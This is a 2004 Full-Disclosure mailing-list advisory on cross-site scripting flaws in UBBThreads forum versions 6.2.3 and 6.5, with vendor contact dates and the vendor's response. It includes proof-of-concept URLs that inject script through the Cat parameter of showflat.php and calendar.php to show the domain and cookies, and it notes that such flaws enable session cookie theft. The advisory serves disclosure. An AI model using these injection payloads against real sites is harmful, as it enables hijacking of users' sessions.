Vendor: Infopop
URL: http://www.infopop.com/
tested Versions: 6.2.3 & 6.5
remote: yes
vendor notified: 06 Dec 2004 at 01:08 AM
Vendor response: 06/07 Dec 2004 01:33 AM/06:08 PM
Update status: ..in process


============================================================



Summary:
~~~~~~~
UBBThreads is a High end forum system, powered under
PHP and MySQL with many attitude.
A security vulnerability in both (6.2.3 & 6.5) products
allow malicious users to steal session cookies, but
probably more versions are vulnerable.
============================================================



Examples in Version 6.2.3:
~~~~~~~~~~~~~~~~~~~~~~~~~~

[forum]/showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));

tested modules are:
main, search, newuser, login, online, faq, ect..


Note:
~~~~
some of these were fixed in Version 6.5.
It follows the not fixed..
============================================================



Examples in version 6.5:
~~~~~~~~~~~~~~~~~~~~~~~~

[forum]/calendar.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C/SCRIPT%3E%0D%0A"));


[forum]/login.php?Cat=[XSS(s.a.)]

and:
[forum]/online.php?Cat=[XSS(s.a.)]



============================================================



Vendor:
~~~~~
Vulnerabilities will be fixed in the next release,
Version 6.5.1. Since March 2004, Infopop offers no longer
support for any version of UBB.classic or UBB.threads
prior to Version 6.0.

http://www.infopop.com/
http://www.ubbcentral.com/



============================================================

Credits:
~~~~~
dw.; ms.; ect.


-- 
kind regards
g@cat <-> MM


-----------------------------------------
This email was sent using FREE Catholic Online Webmail!
http://webmail.catholic.org/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html